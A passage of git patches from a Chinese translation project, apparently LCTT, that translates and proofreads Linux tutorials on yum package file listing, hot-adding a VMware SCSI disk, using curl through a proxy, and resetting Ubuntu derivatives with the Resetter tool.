+使用以下命令列出 yum 安装 htop 的文件:
+
+```
+# rpm -q {packageNameHere}
+# rpm -ql htop
+```
+
+输出例子:
+
+```
+/usr/bin/htop
+/usr/share/doc/htop-2.0.2
+/usr/share/doc/htop-2.0.2/AUTHORS
+/usr/share/doc/htop-2.0.2/COPYING
+/usr/share/doc/htop-2.0.2/ChangeLog
+/usr/share/doc/htop-2.0.2/README
+/usr/share/man/man1/htop.1.gz
+/usr/share/pixmaps/htop.png
+
+```
+
+### 如何使用 repoquery 命令查看 yum 安装的软件包的位置
+
+首先使用 [yum 命令][2] 安装 yum-utils 软件包:
+
+```
+# yum install yum-utils
+```
+
+例子输出:
+
+```
+Resolving Dependencies
+--> Running transaction check
+---> Package yum-utils.noarch 0:1.1.31-42.el7 will be installed
+--> Processing Dependency: python-kitchen for package: yum-utils-1.1.31-42.el7.noarch
+--> Processing Dependency: libxml2-python for package: yum-utils-1.1.31-42.el7.noarch
+--> Running transaction check
+---> Package libxml2-python.x86_64 0:2.9.1-6.el7_2.3 will be installed
+---> Package python-kitchen.noarch 0:1.1.1-5.el7 will be installed
+--> Finished Dependency Resolution
+
+Dependencies Resolved
+
+=======================================================================================
+ Package Arch Version Repository Size
+=======================================================================================
+Installing:
+ yum-utils noarch 1.1.31-42.el7 rhui-rhel-7-server-rhui-rpms 117 k
+Installing for dependencies:
+ libxml2-python x86_64 2.9.1-6.el7_2.3 rhui-rhel-7-server-rhui-rpms 247 k
+ python-kitchen noarch 1.1.1-5.el7 rhui-rhel-7-server-rhui-rpms 266 k
+
+Transaction Summary
+=======================================================================================
+Install 1 Package (+2 Dependent packages)
+
+Total download size: 630 k
+Installed size: 3.1 M
+Is this ok [y/d/N]: y
+Downloading packages:
+(1/3): python-kitchen-1.1.1-5.el7.noarch.rpm | 266 kB 00:00:00
+(2/3): libxml2-python-2.9.1-6.el7_2.3.x86_64.rpm | 247 kB 00:00:00
+(3/3): yum-utils-1.1.31-42.el7.noarch.rpm | 117 kB 00:00:00
+---------------------------------------------------------------------------------------
+Total 1.0 MB/s | 630 kB 00:00
+Running transaction check
+Running transaction test
+Transaction test succeeded
+Running transaction
+ Installing : python-kitchen-1.1.1-5.el7.noarch 1/3
+ Installing : libxml2-python-2.9.1-6.el7_2.3.x86_64 2/3
+ Installing : yum-utils-1.1.31-42.el7.noarch 3/3
+ Verifying : libxml2-python-2.9.1-6.el7_2.3.x86_64 1/3
+ Verifying : yum-utils-1.1.31-42.el7.noarch 2/3
+ Verifying : python-kitchen-1.1.1-5.el7.noarch 3/3
+
+Installed:
+ yum-utils.noarch 0:1.1.31-42.el7
+
+Dependency Installed:
+ libxml2-python.x86_64 0:2.9.1-6.el7_2.3 python-kitchen.noarch 0:1.1.1-5.el7
+
+Complete!
+```
+
+### 如何列出通过 yum 安装的命令?
+
+使用 repoquery 命令:
+
+`# repoquery --list htop`
+
+或者
+
+`# repoquery -l htop`
+
+例子输出:
+
+[![yum where is package installed][5]][5]
+
+你也可以使用 type 命令或者 command 命令查找指定二进制文件的位置,例如 httpd 或者 htop :
+
+
+```
+$ type -a httpd
+$ type -a htop
+$ command -V htop
+```
+
+### 关于作者
+
+作者是 nixCraft 的创始人,是经验丰富的系统管理员并且是 Linux 命令行脚本编程的教练。他拥有全球多行业合作的经验,客户包括 IT,教育,安防和空间研究。他的联系方式:[Twitter][6], [Facebook][7], [Google+][8]。
+
+--------------------------------------------------------------------------------
+
+via: https://www.cyberciti.biz/faq/yum-determining-finding-path-that-yum-package-installed-to/
+
+作者:[][a]
+译者:[译者 ID](https://github.com/cyleung)
+校对:[校对者 ID](https://github.com/ 校对者 ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux 中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.cyberciti.biz
+[1]:https://www.cyberciti.biz/faq/centos-redhat-linux-install-htop-command-using-yum/
+[2]:https://www.cyberciti.biz/faq/rhel-centos-fedora-linux-yum-command-howto/ (See Linux/Unix yum command examples for more info)
+[3]:https://www.cyberciti.biz/tips/linux-debian-package-management-cheat-sheet.html (See Linux/Unix apt-get command examples for more info)
+[4]:https://www.cyberciti.biz/faq/ubuntu-lts-debian-linux-apt-command-examples/ (See Linux/Unix apt command examples for more info)
+[5]:https://www.cyberciti.biz/media/new/faq/2018/01/yum-where-is-package-installed.jpg
+[6]:https://twitter.com/nixcraft
+[7]:https://facebook.com/nixcraft
+[8]:https://plus.google.com/+CybercitiBiz
+
+
From e7cc7f6c63efe588d95143aead0332145483648c Mon Sep 17 00:00:00 2001
From: darksun
Date: Mon, 8 Jan 2018 16:01:00 +0800
Subject: [PATCH 171/371] translate done: 20090718 Vmware Linux Guest Add a New
Hard Disk Without Rebooting Guest.md
---
...a New Hard Disk Without Rebooting Guest.md | 105 +++++++++---------
1 file changed, 52 insertions(+), 53 deletions(-)
rename {sources => translated}/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md (64%)
diff --git a/sources/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md b/translated/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
similarity index 64%
rename from sources/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
rename to translated/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
index 0845866f51..6c57fd9090 100644
--- a/sources/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
+++ b/translated/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
@@ -1,76 +1,75 @@
-translating by lujun9972
-
-Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest
+在不重启的情况下为 Vmware Linux 客户机添加新硬盘
======
-As a system admin, I need to use additional hard drives for to provide more storage space or to separate system data from user data. This procedure, adding physical block devices to virtualized guests, describes how to add a hard drive on the host to a virtualized guest using VMWare software running Linux as guest.
+作为一名系统管理员,我经常需要用额外的硬盘来扩充存储空间或将系统数据从用户数据中分离出来。将物理块设备加到虚拟主机的这个过程,告诉你如何将一个块主机上的硬盘加到一台使用 VMWare 软件虚拟化的 Linux 客户机上。
-It is possible to add or remove a SCSI device explicitly, or to re-scan an entire SCSI bus without rebooting a running Linux VM guest. This how to is tested under Vmware Server and Vmware Workstation v6.0 (but should work with older version too). All instructions are tested on RHEL, Fedora, CentOS and Ubuntu Linux guest / hosts operating systems.
+你可以显式的添加或删除一个 SCSI 设备,或者重新扫描整个 SCSI 总线而不用重启 Linux 虚拟机。本指南在 Vmware Server 和 Vmware Workstation v6.0 中通过测试(更老版本应该也支持)。所有命令在 RHEL,Fedora,CentOS 和 Ubuntu Linux 客户机 / 主机操作系统下都经过了测试。
-## Step # 1: Add a New Disk To Vm Guest
+## 步骤 # 1:添加新硬盘到虚拟客户机
-First, you need to add hard disk by visiting vmware hardware settings menu.
-Click on VM > Settings
+首先,通过 vmware 硬件设置菜单添加硬盘。
+点击 VM > Settings
-![Fig.01: Vmware Virtual Machine Settings ][1]
+![Fig.01:Vmware Virtual Machine Settings ][1]
-Alternatively you can press CTRL + D to bring settings dialog box.
+或者你也可以按下 CTRL + D 也能进入设置对话框。
-Click on Add+ to add new hardware to guest:
+点击 Add+ 添加新硬盘到客户机:
-![Fig.02: VMWare adding a new hardware][2]
+![Fig.02:VMWare adding a new hardware][2]
+
+选择硬件类型为 Hard disk 然后点击 Next
-Select hardware type Hard disk and click on Next
![Fig.03 VMware Adding a new disk wizard ][3]
-Select create a new virtual disk and click on Next
+选择 `create a new virtual disk` 然后点击 Next
-![Fig.04: Vmware Wizard Disk ][4]
+![Fig.04:Vmware Wizard Disk ][4]
-Set virtual disk type to SCSI and click on Next
+设置虚拟磁盘类型为 SCSI 然后点击 Next
-![Fig.05: Vmware Virtual Disk][5]
+![Fig.05:Vmware Virtual Disk][5]
-Set maximum disk size as per your requirements and click on Next
+按需要设置最大磁盘大小,然后点击 Next
-![Fig.06: Finalizing Disk Virtual Addition ][6]
+![Fig.06:Finalizing Disk Virtual Addition ][6]
-Finally, set file location and click on Finish.
+最后,选择文件存放位置然后点击 Finish。
-## Step # 2: Rescan the SCSI Bus to Add a SCSI Device Without rebooting the VM
+## 步骤 # 2:重新扫描 SCSI 总线,在不重启虚拟机的情况下添加 SCSI 设备
-A rescan can be issued by typing the following command:
+输入下面命令重新扫描 SCSI 总线:
```
-echo "- - -" > /sys/class/scsi_host/ **host#** /scan
+echo "- - -" > /sys/class/scsi_host/host# /scan
fdisk -l
tail -f /var/log/message
```
-Sample outputs:
+输出为:
![Linux Vmware Rescan New Scsi Disk Without Reboot][7]
-Replace host# with actual value such as host0. You can find scsi_host value using the following command:
+你需要将 `host#` 替换成真实的值,比如 host0。你可以通过下面命令来查出这个值:
`# ls /sys/class/scsi_host`
-Output:
+输出:
```
host0
```
-Now type the following to send a rescan request:
+然后输入下面过命令来请求重新扫描:
```
-echo "- - -" > /sys/class/scsi_host/ **host0** /scan
+echo "- - -" > /sys/class/scsi_host/host0/scan
fdisk -l
tail -f /var/log/message
```
-Sample Outputs:
+输出为:
```
Jul 18 16:29:39 localhost kernel: Vendor: VMware, Model: VMware Virtual S Rev: 1.0
@@ -109,33 +108,33 @@ Jul 18 16:29:39 localhost kernel: sd 0:0:2:0: Attached scsi disk sdc
Jul 18 16:29:39 localhost kernel: sd 0:0:2:0: Attached scsi generic sg2 type 0
```
-### How Do I Delete a Single Device Called /dev/sdc?
+### 如何删除 =/dev/sdc= 这块设备?
-In addition to re-scanning the entire bus, a specific device can be added or existing device deleted using the following command:
+除了重新扫描整个总线外,你也可以使用下面命令添加或删除指定磁盘:
```
# echo 1 > /sys/block/devName/device/delete
-# echo 1 > /sys/block/ **sdc** /device/delete
+# echo 1 > /sys/block/sdc/device/delete
```
-### How Do I Add a Single Device Called /dev/sdc?
+### 如何添加 =/dev/sdc= 这块设备?
-To add a single device explicitly, use the following syntax:
+使用下面语法添加指定设备:
```
# echo "scsi add-single-device " > /proc/scsi/scsi
```
-Where,
+这里,
- * : Host
- * : Bus (Channel)
- * : Target (Id)
- * : LUN numbers
+ * :Host
+ * :Bus (Channel)
+ * :Target (Id)
+ * :LUN numbers
-For e.g. add /dev/sdc with host # 0, bus # 0, target # 2, and LUN # 0, enter:
+例如。使用参数 host#0,bus#0,target#2,以及 LUN#0 来添加 /dev/sdc,则输入:
```
# echo "scsi add-single-device 0 0 2 0">/proc/scsi/scsi
@@ -143,7 +142,7 @@ For e.g. add /dev/sdc with host # 0, bus # 0, target # 2, and LUN # 0, enter:
# cat /proc/scsi/scsi
```
-Sample Outputs:
+结果输出:
```
Attached devices:
@@ -158,9 +157,9 @@ Host: scsi0 Channel: 00 Id: 02 Lun: 00
Type: Direct-Access ANSI SCSI revision: 02
```
-## Step #3: Format a New Disk
+## 步骤 #3:格式化新磁盘
-Now, you can create partition using [fdisk and format it using mkfs.ext3][8] command:
+现在使用 [fdisk 并通过 mkfs.ext3][8] 命令创建分区:
```
# fdisk /dev/sdc
@@ -170,39 +169,39 @@ Now, you can create partition using [fdisk and format it using mkfs.ext3][8] com
# mkfs.ext4 /dev/sdc3
```
-## Step #4: Create a Mount Point And Update /etc/fstab
+## 步骤 #4:创建挂载点并更新 /etc/fstab
`# mkdir /disk3`
-Open /etc/fstab file, enter:
+打开 /etc/fstab 文件,输入:
`# vi /etc/fstab`
-Append as follows:
+加入下面这行:
```
/dev/sdc3 /disk3 ext3 defaults 1 2
```
-For ext4 fs:
+若是 ext4 文件系统则加入:
```
/dev/sdc3 /disk3 ext4 defaults 1 2
```
-Save and close the file.
+保存并关闭文件。
-#### Optional Task: Label the partition
+#### 可选操作:为分区加标签
-[You can label the partition using e2label command][9]. For example, if you want to label the new partition /backupDisk, enter
+[你可以使用 e2label 命令为分区加标签 ][9]。假设,你想要为 /backupDisk 这块新分区加标签,则输入
`# e2label /dev/sdc1 /backupDisk`
-See "[The importance of Linux partitions][10]
+详情参见 "[Linux 分区的重要性 ][10]
-## about the author
+## 关于作者
-The author is the creator of nixCraft and a seasoned sysadmin and a trainer for the Linux operating system/Unix shell scripting. He has worked with global clients and in various industries, including IT, education, defense and space research, and the nonprofit sector. Follow him on [Twitter][11], [Facebook][12], [Google+][13].
+作者即是 nixCraft 的创造者,也是一名经验丰富的系统管理员,还是 Linux 操作系统 /Unix shell 脚本培训师。他曾服务过全球客户并与多个行业合作过,包括 IT,教育,国防和空间研究,以及非盈利机构。你可以在 [Twitter][11],[Facebook][12],[Google+][13] 上关注它。
--------------------------------------------------------------------------------
From 6203fd62b767454039a262a19490333e6f6b1815 Mon Sep 17 00:00:00 2001
From: darksun
Date: Mon, 8 Jan 2018 16:25:06 +0800
Subject: [PATCH 172/371] translate done: 20160117 How to use curl command with
proxy username-password on Linux- Unix.md
---
... proxy username-password on Linux- Unix.md | 50 +++++++++----------
1 file changed, 24 insertions(+), 26 deletions(-)
rename {sources => translated}/tech/20160117 How to use curl command with proxy username-password on Linux- Unix.md (64%)
diff --git a/sources/tech/20160117 How to use curl command with proxy username-password on Linux- Unix.md b/translated/tech/20160117 How to use curl command with proxy username-password on Linux- Unix.md
similarity index 64%
rename from sources/tech/20160117 How to use curl command with proxy username-password on Linux- Unix.md
rename to translated/tech/20160117 How to use curl command with proxy username-password on Linux- Unix.md
index ecc95d8432..8e3e1dae81 100644
--- a/sources/tech/20160117 How to use curl command with proxy username-password on Linux- Unix.md
+++ b/translated/tech/20160117 How to use curl command with proxy username-password on Linux- Unix.md
@@ -1,8 +1,8 @@
translating by lujun9972
-How to use curl command with proxy username/password on Linux/ Unix
+如何让 curl 命令通过代理访问
======
-My sysadmin provided me the following proxy details:
+我的系统管理员给我提供了如下代理信息:
```
IP: 202.54.1.1
Port: 3128
@@ -10,15 +10,14 @@ Username: foo
Password: bar
```
-The settings worked perfectly with Google Chrome and Firefox browser. How do I use it with the curl command? How do I tell the curl command to use my proxy settings from Google Chrome browser?
+该设置在 Google Chrome 和 Firefox 浏览器上很容易设置。但是我要怎么把它应用到 curl 命令上呢?我要如何让 curl 命令使用我在 Google Chrome 浏览器上的代理设置呢?
+
+很多 Linux 和 Unix 命令行工具(比如 curl 命令,wget 命令,lynx 命令等)使用名为 `http_proxy`,`https_proxy`,`ftp_proxy` 的环境变量来获取代理信息。它允许你通过代理服务器(使用或不使用用户名/密码都行)来连接那些基于文本的会话和应用。**本文就会演示一下如何让 curl 通过代理服务器发送 HTTP/HTTPS 请求。**
+
+## 让 curl 命令使用代理的语法
-Many Linux and Unix command line tools such as curl command, wget command, lynx command, and others; use the environment variable called http_proxy, https_proxy, ftp_proxy to find the proxy details. It allows you to connect text based session and applications via the proxy server with or without a userame/password. T **his page shows how to perform HTTP/HTTPS requests with cURL cli using PROXY server.**
-
-## Unix and Linux curl command with proxy syntax
-
-
-The syntax is:
+语法为:
```
## Set the proxy address of your uni/company/vpn network ##
export http_proxy=http://your-ip-address:port/
@@ -32,7 +31,7 @@ export https_proxy=https://user:password@your-proxy-ip-address:port/
```
-Another option is to pass the -x option to the curl command. To use the specified proxy:
+另一种方法是使用 curl 命令的 -x 选项:
```
curl -x <[protocol://][user:password@]proxyhost[:port]> url
--proxy <[protocol://][user:password@]proxyhost[:port]> url
@@ -40,9 +39,9 @@ curl -x <[protocol://][user:password@]proxyhost[:port]> url
-x http://user:password@Your-Ip-Here:Port url
```
-## Linux use curl command with proxy
+## 在 Linux 上的一个例子
-First set the http_proxy:
+首先设置 `http_proxy`:
```
## proxy server, 202.54.1.1, port: 3128, user: foo, password: bar ##
export http_proxy=http://foo:bar@202.54.1.1:3128/
@@ -51,7 +50,7 @@ export https_proxy=$http_proxy
curl -I https://www.cyberciti.biz
curl -v -I https://www.cyberciti.biz
```
-Sample outputs:
+输出为:
```
* Rebuilt URL to: www.cyberciti.biz/
@@ -98,44 +97,43 @@ Connection: keep-alive
* Connection #0 to host 10.12.249.194 left intact
```
-
-In this example, I'm downloading a pdf file:
+本例中,我来下载一个 pdf 文件:
```
$ export http_proxy="vivek:myPasswordHere@10.12.249.194:3128/"
$ curl -v -O http://dl.cyberciti.biz/pdfdownloads/b8bf71be9da19d3feeee27a0a6960cb3/569b7f08/cms/631.pdf
```
-OR use the -x option:
+也可以使用 -x 选项:
```
curl -x 'http://vivek:myPasswordHere@10.12.249.194:3128' -v -O https://dl.cyberciti.biz/pdfdownloads/b8bf71be9da19d3feeee27a0a6960cb3/569b7f08/cms/631.pdf
```
-Sample outputs:
-[![Fig.01: curl in action \(click to enlarge\)][1]][2]
+输出为:
+![Fig.01:curl in action \(click to enlarge\)][1]
-## How to use the specified proxy server with curl on Unix
+## Unix 上的一个例子
```
$ curl -x http://prox_server_vpn:3128/ -I https://www.cyberciti.biz/faq/howto-nginx-customizing-404-403-error-page/
```
-## How to use socks protocol?
+## socks 协议怎么办呢?
-The syntax is same:
+语法也是一样的:
```
curl -x socks5://[user:password@]proxyhost[:port]/ url
curl --socks5 192.168.1.254:3099 https://www.cyberciti.biz/
```
-## How do I configure and setup curl to permanently use a proxy connection?
+## 如何让代理设置永久生效?
-Update/edit your ~/.curlrc file using a text editor such as vim:
+编辑 ~/.curlrc 文件:
`$ vi ~/.curlrc`
-Append the following:
+添加下面内容:
```
proxy = server1.cyberciti.biz:3128
proxy-user = "foo:bar"
```
-Save and close the file. Another option is create a bash shell alias in your ~/.bashrc file:
+保存并关闭该文件。另一种方法是在你的 `~/.bashrc` 文件中创建一个别名:
```
## alias for curl command
## set proxy-server and port, the syntax is
@@ -143,7 +141,7 @@ Save and close the file. Another option is create a bash shell alias in your ~/.
alias curl = "curl -x server1.cyberciti.biz:3128"
```
-Remember, the proxy string can be specified with a protocol:// prefix to specify alternative proxy protocols. Use socks4://, socks4a://, socks5:// or socks5h:// to request the specific SOCKS version to be used. No protocol specified, http:// and all others will be treated as HTTP proxies. If the port number is not specified in the proxy string, it is assumed to be 1080. The -x option overrides existing environment variables that set the proxy to use. If there's an environment variable setting a proxy, you can set proxy to "" to override it. See curl command man page [here for more info][3].
+记住,代理字符串中可以使用 `protocol://` 前缀来指定不同的代理协议。使用 `socks4://`,`socks4a://`,`socks5:// `或者 `socks5h://` 来指定使用的 SOCKS 版本。若没有指定协议或者 `http://` 表示 HTTP 协议。若没有指定端口号则默认为 1080。-x 选项的值要优先于环境变量设置的值。若不想走代理,而环境变量总设置了代理,那么可以通过设置代理为 "" 来覆盖环境变量的值。[详细信息请参阅 curl 的 man 页 ][3]。
--------------------------------------------------------------------------------
From 29107bc8922e4748022a1590e4f8b44bce817635 Mon Sep 17 00:00:00 2001
From: wxy
Date: Mon, 8 Jan 2018 18:46:55 +0800
Subject: [PATCH 173/371] PRF:20171229 Set Ubuntu Derivatives Back to Default
with Resetter.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@stevenzdg988 要注意使用中文标点,并注意 MD 格式。最好提交之前预览一下 md 的渲染样式。
---
...rivatives Back to Default with Resetter.md | 125 ++++++++----------
1 file changed, 56 insertions(+), 69 deletions(-)
diff --git a/translated/tech/20171229 Set Ubuntu Derivatives Back to Default with Resetter.md b/translated/tech/20171229 Set Ubuntu Derivatives Back to Default with Resetter.md
index bc5d6a09d6..3fd3768d6e 100644
--- a/translated/tech/20171229 Set Ubuntu Derivatives Back to Default with Resetter.md
+++ b/translated/tech/20171229 Set Ubuntu Derivatives Back to Default with Resetter.md
@@ -1,128 +1,115 @@
-translated by stevenzdg988
-
-利用 Resetter 将 Ubuntu 衍生版重置为初始状态
+利用 Resetter 将 Ubuntu 系发行版重置为初始状态
======
-有多少次你投入到Ubuntu(或Ubuntu衍生版本),配置某项内容和安装软件,却发现你的桌面(或服务器)平台并不是你想要的。当在机器上产生了大量的用户文件时,这种情况可能会出现问题。既然这样,你有一个选择,你或者可以备份你所有的数据,重新安装操作系统,然后将您的数据复制回本机,或者也可以利用一种类似于[Resetter][1]的工具做同样的事情。
-Resetter 是一个新的工具(由加拿大开发者,被称为"[gaining][2]"),用python和PyQt,将重置Ubuntu,Linux Mint(和一些其他的,基于Ubuntu的衍生版)回到初始配置。Resetter 提供了两种不同的复位选项:自动和自定义。利用自动选项,工具就会完成以下内容:
- * 删除用户安装的应用软件
+![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/resetter_0.png?itok=YEX5IGdx)
- * 删除用户及家目录
+*这个 Resetter 工具可以将 Ubuntu、 Linux Mint (以及其它基于 Ubuntu 的发行版)返回到其初始配置。*
- * 创建默认备份用户
+有多少次你投身于 Ubuntu(或 Ubuntu 衍生版本),配置某项内容和安装软件,却发现你的桌面(或服务器)平台并不是你想要的结果。当在机器上产生了大量的用户文件时,这种情况可能会出现问题。既然这样,你有一个选择,你要么可以备份你所有的数据,重新安装操作系统,然后将您的数据复制回本机,或者也可以利用一种类似于 [Resetter][1] 的工具做同样的事情。
- * 自动安装预装的应用软件(MPIAs)
+Resetter 是一个新的工具(由名为“[gaining][2]”的加拿大开发者开发),用 Python 和 PyQt 编写,它将会重置 Ubuntu、Linux Mint(和一些其他的,基于 Ubuntu 的衍生版)回到初始配置。Resetter 提供了两种不同的复位选择:自动和自定义。利用自动方式,工具就会完成以下内容:
- * 删除非默认用户
+* 删除用户安装的应用软件
+* 删除用户及家目录
+* 创建默认备份用户
+* 自动安装缺失的预装应用软件(MPIA)
+* 删除非默认用户
+* 删除 snap 软件包
- * 删除协议软件包
+自定义方式会:
-自定义选项:
+* 删除用户安装的应用程序或者允许你选择要删除的应用程序
+* 删除旧的内核
+* 允许你选择用户进行删除
+* 删除用户及家目录
+* 创建默认备份用户
+* 允许您创建自定义备份用户
+* 自动安装缺失的预装应用软件(MPIA)或选择 MPIA 进行安装
+* 删除非默认用户
+* 查看所有相关依赖包
+* 删除 snap 软件包
- * 删除用户安装的应用程序或者允许你选择要删除的应用程序
+我将带领您完成安装和使用 Resetter 的过程。但是,我必须告诉你这个工具非常前期的测试版。即便如此, Resetter 绝对值得一试。实际上,我鼓励您测试该应用程序并提交 bug 报告(您可以通过 [GitHub][3] 提交,或者直接发送给开发人员的电子邮件地址 [gaining7@outlook.com][4])。
- * 删除旧的内核
+还应注意的是,目前仅支持的衍生版有:
- * 允许你选择用户进行删除
+* Debian 9.2 (稳定)Gnome 版本
+* Linux Mint 17.3+(对 Mint 18.3 的支持即将推出)
+* Ubuntu 14.04+ (虽然我发现不支持 17.10)
+* Elementary OS 0.4+
+* Linux Deepin 15.4+
- * 删除用户及家目录
+说到这里,让我们安装和使用 Resetter。我将在 [Elementary OS Loki][5] 平台展示。
- * 创建默认备份用户
-
- * 允许您创建自定义备份用户
-
- * 自动安装MPIAs或选择MPIAs进行安装
-
- * 删除非默认用户
-
- * 查看所有相关依赖包
-
- * 删除协议软件包
-
-我将带领您完成安装和使用Resetter的过程。但是,我必须告诉你这个工具非常的测试版。即便如此,resetter绝对值得一试。实际上,我鼓励您测试应用程序并提交bug报告(您可以通过[GitHub][3]提交,或者直接发送给开发人员的电子邮件地址[gaining7@outlook.com][4])。
-It should also be noted that, at the moment, the only supported distributions are:
-还应注意的是,目前仅支持的衍生版有:
- * Debian 9.2(稳定)Gnome版本
- * Linux Mint 17.3 +(支持Mint 18.3即将推出)
- * Ubuntu 14.04+(虽然我发现不支持17.10)
- * Elementary OS 0.4+
- * Linux Deepin 15.4+
-
-说到这里,让我们安装和使用Resetter。我将在[Elementary OS Loki][5]平台展示
### 安装
-有几种方法可以安装Resetter。我选择的方法是通过gdebi辅助应用程序,为什么?因为它将获取安装所需的所有依赖项。首先,我们必须安装那个特定的工具。打开终端窗口并发出命令:
+有几种方法可以安装 Resetter。我选择的方法是通过 `gdebi` 辅助应用程序,为什么?因为它将获取安装所需的所有依赖项。首先,我们必须安装这个特定的工具。打开终端窗口并发出命令:
+
```
sudo apt install gdebi
```
-一旦安装完毕,请将浏览器指向[Resetter下载页面][6],并下载该软件的最新版本。一旦下载完毕,打开文件管理器,导航到下载的文件,然后单击(或双击,这取决于你如何配置你的桌面)在resetter_xxx - stable_all.deb文件(XXX是版本号)。gdebi应用程序将会打开(图1)。点击安装包按钮,输入你的sudo密码,接下来 Resetter 将开始安装。
-## [resetter_1.jpg][7]
+
+一旦安装完毕,请将浏览器指向 [Resetter 下载页面][6],并下载该软件的最新版本。一旦下载完毕,打开文件管理器,导航到下载的文件,然后单击(或双击,这取决于你如何配置你的桌面) `resetter_XXX-stable_all.deb` 文件(XXX 是版本号)。`gdebi` 应用程序将会打开(图 1)。点击安装包按钮,输入你的 `sudo` 密码,接下来 Resetter 将开始安装。
+
![gdebi][8]
-图1:利用gdebi安装Resetter
-[使用许可][9]
+*图 1:利用 gdebi 安装 Resetter*
当安装完成,准备接下来的操作。
+
### 使用 Resetter
-记住,在做这个之前,必须备份数据。别怪我没提醒你。从终端窗口发出命令```sudo resetter```。您将被提示输入sudo密码。一旦Resetter打开,它将自动检测您的发行版(图2)。
-## [resetter_2.jpg][10]
+**记住,在这之前,必须备份数据。别怪我没提醒你。**
+
+从终端窗口发出命令 `sudo resetter`。您将被提示输入 `sudo`密码。一旦 Resetter 打开,它将自动检测您的发行版(图 2)。
![Resetter][11]
-图2: Resetter 主窗口
-[使用许可][9]
+*图 2:Resetter 主窗口*
-我们将通过自动重置来测试 Resetter 的流程。从主窗口,点击Automatic Reset(自动复位)。这款应用将提供一个明确的警告,它将把你的操作系统(的实例,Elementary OS 0.4.1 Loki)重新设置为出厂默认状态(图3)。
-## [resetter_3.jpg][12]
+我们将通过自动重置来测试 Resetter 的流程。从主窗口,点击 Automatic Reset(自动复位)。这款应用将提供一个明确的警告,它将把你的操作系统(我的实例,Elementary OS 0.4.1 Loki)重新设置为出厂默认状态(图 3)。
![警告][13]
-图3:在继续之前,Resetter警告您。
-[用户许可][9]
+*图 3:在继续之前,Resetter 会警告您。 *
-单击Yes,Resetter将显示它将删除的所有包(图4)。如果您没有问题,单击OK,重置将开始。
-## [resetter_4.jpg][14]
+
+单击“Yes”,Resetter 会显示它将删除的所有包(图 4)。如果您没有问题,单击 OK,重置将开始。
![移除软件包][15]
-图4:所有要删除的包,以便将 Elementary OS 重置为出厂默认值。
-[使用许可][9]
+*图 4:所有要删除的包,以便将 Elementary OS 重置为出厂默认值。*
-在重置过程中,应用程序将显示一个进度窗口(图5)。根据安装的数量,这个过程不应该花费太长时间。
-## [resetter_5.jpg][16]
+在重置过程中,应用程序将显示一个进度窗口(图 5)。根据安装的数量,这个过程不应该花费太长时间。
![进度][17]
-图5: Resetter 进度窗口
-[使用许可][9]
+*图 5:Resetter 进度窗口*
-当进程完成时,Resetter将显示一个新的用户名和密码,以便重新登录到新重置的发行版(图6)。
-## [resetter_6.jpg][18]
+当过程完成时,Resetter 将显示一个新的用户名和密码,以便重新登录到新重置的发行版(图 6)。
![新用户][19]
-图6:新用户及密码
-[使用许可][9]
+*图 6:新用户及密码*
+
+单击 OK,然后当提示时单击“Yes”以重新启动系统。当提示登录时,使用 Resetter 应用程序提供给您的新凭证。成功登录后,您需要重新创建您的原始用户。该用户的主目录仍然是完整的,所以您需要做的就是发出命令 `sudo useradd USERNAME` ( USERNAME 是用户名)。完成之后,发出命令 `sudo passwd USERNAME` (USERNAME 是用户名)。使用设置的用户/密码,您可以注销并以旧用户的身份登录(使用在重新设置操作系统之前相同的家目录)。
-单击OK,然后在提示单击Yes以重新启动系统。当提示登录时,使用 Resetter 应用程序提供给您的新凭证。成功登录后,您需要重新创建您的原始用户。该用户的主目录仍然是完整的,所以您需要做的就是发出命令```sudo useradd USERNAME (USERNAME 是用户名)```。完成之后,发出命令```sudo passwd USERNAME (USERNAME 是用户名)```。使用设置的用户/密码,您可以注销并以旧用户的身份登录(在重新设置操作系统之前使用相同的家目录)。
### 我的成果
-我必须承认,在将密码添加到我的老用户(并通过使用su命令对该用户进行更改)之后,我无法使用该用户登录到 Elementary OS 桌面。为了解决这个问题,我登录了Resetter-created 用户,移动了老用户的家目录,删除了老用户(使用命令``` sudo deluser jack```),并重新创建了老用户(使用命令```sudo useradd -m jack```)。
+我必须承认,在将密码添加到我的老用户(并通过使用 `su` 命令切换到该用户进行测试)之后,我无法使用该用户登录到 Elementary OS 桌面。为了解决这个问题,我登录了 Resetter 所创建的用户,移动了老用户的家目录,删除了老用户(使用命令 `sudo deluser jack`),并重新创建了老用户(使用命令 `sudo useradd -m jack`)。
-这样做之后,我检查了原始的家目录,只发现了用户的所有权从 jack.jack 变成了 1000.1000。利用命令 ```sudo chown -R jack.jack /home/jack```,就可以容易的修正这个问题。这非常关键?如果您使用Resetter并发现无法用您的老用户登录(在您重新创建用户并设置一个新密码之后),请确保更改用户的家目录的所有权限。
+这样做之后,我检查了原始的家目录,只发现了用户的所有权从 `jack.jack` 变成了 `1000.1000`。利用命令 `sudo chown -R jack.jack /home/jack`,就可以容易的修正这个问题。教训是什么?如果您使用 Resetter 并发现无法用您的老用户登录(在您重新创建用户并设置一个新密码之后),请确保更改用户的家目录的所有权限。
-在这个问题之外,Resetter在将 Elementary OS Loki 恢复到默认状态方面做了大量的工作。虽然 Resetter 处在测试中,但它是一个相当令人印象深刻的工具。试一试,看看你是否有和我一样出色的成绩。
+在这个问题之外,Resetter 在将 Elementary OS Loki 恢复到默认状态方面做了大量的工作。虽然 Resetter 处在测试中,但它是一个相当令人印象深刻的工具。试一试,看看你是否有和我一样出色的成绩。
-从Linux基金会和edX的免费[" Linux入门"][20]课程学习更多关于Linux的知识。
--------------------------------------------------------------------------------
via: https://www.linux.com/learn/intro-to-linux/2017/12/set-ubuntu-derivatives-back-default-resetter
作者:[Jack Wallen][a]
译者:[stevenzdg988](https://github.com/stevenzdg988)
-校对:[校对者ID](https://github.com/校对者ID)
